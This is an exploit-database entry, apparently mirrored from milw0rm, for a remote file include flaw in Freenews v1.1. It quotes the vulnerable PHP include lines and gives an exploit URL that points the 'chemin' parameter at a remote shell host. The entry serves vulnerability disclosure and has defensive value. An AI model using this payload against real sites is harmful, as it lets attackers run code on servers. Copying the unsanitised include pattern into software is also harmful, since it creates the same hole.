header-logo
Suggest Exploit
vendor:
Freenews
by:
XORON
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Freenews
Affected Version From: v1.1
Affected Version To: v1.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Freenews v1.1 <= (chemin) Remote File Include Vulnerability

Freenews v1.1 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameter 'chemin' in 'moteur.php' script. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Freenews v1.1 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Freenews v1.1 <= (chemin) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:
http://membres.lycos.fr/fdproweb/fdproweb/php_scripts/freenews1_1.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[freenews_path]/moteur/moteur.php?chemin=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,DJR

www.cyber-warrior.org
www.team-rootshell.com
irc.milw0rm.com #rootshell

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-08]